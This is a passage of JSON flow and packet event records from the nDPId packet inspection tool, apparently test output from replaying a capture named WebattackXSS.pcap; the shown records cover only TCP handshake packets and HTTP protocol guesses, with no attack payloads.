-00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6230,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":441,"flow_packet_id":2,"flow_last_seen":1499347713588,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347713588,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ6vp4zY2Qd\/r\/vKAScSCfOwAAAgQFtAQCCAoD5ZHOATvAWQEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6231,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":441,"flow_packet_id":3,"flow_last_seen":1499347713589,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347713589,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0P+NAAD4GhfWsEAABwKgKMur6AFB3+v+8eM2NkYAQAOU+QwAAAQEICgE7wFkD5ZHO"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6247,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":442,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347716243,"flow_last_seen":1499347716243,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347716243,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60180,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6247,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":442,"flow_packet_id":1,"flow_last_seen":1499347716243,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347716243,"pkt":"ABm5CmnxAMGxFOsxCABFAAA821BAAD4G6n+sEAABwKgKMusUAFBsBhmhAAAAAKACchApywAAAgQFtAQCCAoBO8LxAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6248,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":442,"flow_packet_id":2,"flow_last_seen":1499347716243,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347716243,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ6xT1wuHkbAYZoqAScSC6tgAAAgQFtAQCCAoD5ZRmATvC8QEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6249,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":442,"flow_packet_id":3,"flow_last_seen":1499347716244,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347716244,"pkt":"ABm5CmnxAMGxFOsxCABFAAA021FAAD4G6oasEAABwKgKMusUAFBsBhmi9cLh5YAQAOVZvgAAAQEICgE7wvED5ZRm"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6256,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":443,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347717533,"flow_last_seen":1499347717533,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347717533,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60194,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6256,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":443,"flow_packet_id":1,"flow_last_seen":1499347717533,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347717533,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8GKhAAD4GrSisEAABwKgKMusiAFDZTNycAAAAAKACchD4NwAAAgQFtAQCCAoBO8Q0AAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6257,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":443,"flow_packet_id":2,"flow_last_seen":1499347717533,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347717533,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ6yL+myOL2UzcnaAScSA9YgAAAgQFtAQCCAoD5ZWoATvENAEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6258,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":443,"flow_packet_id":3,"flow_last_seen":1499347717534,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347717534,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0GKlAAD4GrS+sEAABwKgKMusiAFDZTNyd\/psjjIAQAOXcaQAAAQEICgE7xDQD5ZWo"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6280,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":444,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347720094,"flow_last_seen":1499347720094,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347720094,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60220,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6280,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":444,"flow_packet_id":1,"flow_last_seen":1499347720094,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347720094,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8qt5AAD4GGvKsEAABwKgKMus8AFAqiGxqAAAAAKACchAUlQAAAgQFtAQCCAoBO8a0AAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6281,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":444,"flow_packet_id":2,"flow_last_seen":1499347720095,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347720095,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ6zwJv9VKKohsa6AScSCaWwAAAgQFtAQCCAoD5ZgpATvGtAEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6282,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":444,"flow_packet_id":3,"flow_last_seen":1499347720095,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347720095,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0qt9AAD4GGvmsEAABwKgKMus8AFAqiGxrCb\/VS4AQAOU5YwAAAQEICgE7xrQD5Zgp"} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6286,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":374,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347602223,"flow_last_seen":1499347607783,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347720100,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58946,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6286,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":374,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347602223,"flow_last_seen":1499347607783,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347720100,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58946,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6286,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":375,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347603507,"flow_last_seen":1499347608786,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347720100,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58960,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6286,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":375,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347603507,"flow_last_seen":1499347608786,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347720100,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58960,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6286,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":376,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347604752,"flow_last_seen":1499347609784,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347720100,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58974,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6286,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":376,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347604752,"flow_last_seen":1499347609784,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347720100,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58974,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6286,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":365,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347585744,"flow_last_seen":1499347590777,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347720100,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58772,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6286,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":365,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347585744,"flow_last_seen":1499347590777,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347720100,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58772,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6286,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":366,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347588270,"flow_last_seen":1499347593778,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347720100,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58798,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6286,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":366,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347588270,"flow_last_seen":1499347593778,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347720100,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58798,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6286,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":367,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347589555,"flow_last_seen":1499347594779,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347720100,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58812,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6286,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":367,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347589555,"flow_last_seen":1499347594779,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347720100,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58812,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6286,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":368,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347592060,"flow_last_seen":1499347597780,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347720100,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58838,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6286,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":368,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347592060,"flow_last_seen":1499347597780,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347720100,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58838,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6286,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":369,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347593330,"flow_last_seen":1499347598782,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347720100,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58852,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6286,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":369,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347593330,"flow_last_seen":1499347598782,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347720100,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58852,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6286,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":370,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347594595,"flow_last_seen":1499347599780,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347720100,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58866,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6286,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":370,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347594595,"flow_last_seen":1499347599780,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347720100,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58866,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6286,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":371,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347597121,"flow_last_seen":1499347602781,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347720100,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58892,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6286,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":371,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347597121,"flow_last_seen":1499347602781,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347720100,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58892,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6286,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":372,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347598383,"flow_last_seen":1499347603782,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347720100,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58906,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6286,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":372,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347598383,"flow_last_seen":1499347603782,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347720100,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58906,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6286,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":373,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347599663,"flow_last_seen":1499347604783,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347720100,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58920,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6286,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":373,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347599663,"flow_last_seen":1499347604783,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347720100,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58920,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6289,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":445,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347721376,"flow_last_seen":1499347721376,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347721376,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60234,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6289,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":445,"flow_packet_id":1,"flow_last_seen":1499347721376,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347721376,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8UaNAAD4GdC2sEAABwKgKMutKAFCqmpZXAAAAAKACchBpRwAAAgQFtAQCCAoBO8f0AAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6290,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":445,"flow_packet_id":2,"flow_last_seen":1499347721376,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347721376,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ60r+f8PRqpqWWKAScSAKhgAAAgQFtAQCCAoD5ZlpATvH9AEDAwc="} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6291,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":445,"flow_packet_id":3,"flow_last_seen":1499347721376,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347721376,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0UaRAAD4GdDSsEAABwKgKMutKAFCqmpZY\/n\/D0oAQAOWpjQAAAQEICgE7x\/QD5Zlp"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6311,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":446,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347724082,"flow_last_seen":1499347724082,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347724082,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60260,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6311,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":446,"flow_packet_id":1,"flow_last_seen":1499347724082,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347724082,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8Pn9AAD4Gh1GsEAABwKgKMutkAFAGCvTmAAAAAKACchCsiQAAAgQFtAQCCAoBO8qZAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6312,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":446,"flow_packet_id":2,"flow_last_seen":1499347724082,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347724082,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ62S3KtySBgr056AScSB5twAAAgQFtAQCCAoD5ZwOATvKmQEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6313,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":446,"flow_packet_id":3,"flow_last_seen":1499347724083,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347724083,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0PoBAAD4Gh1isEAABwKgKMutkAFAGCvTntyrck4AQAOUYvwAAAQEICgE7ypkD5ZwO"} 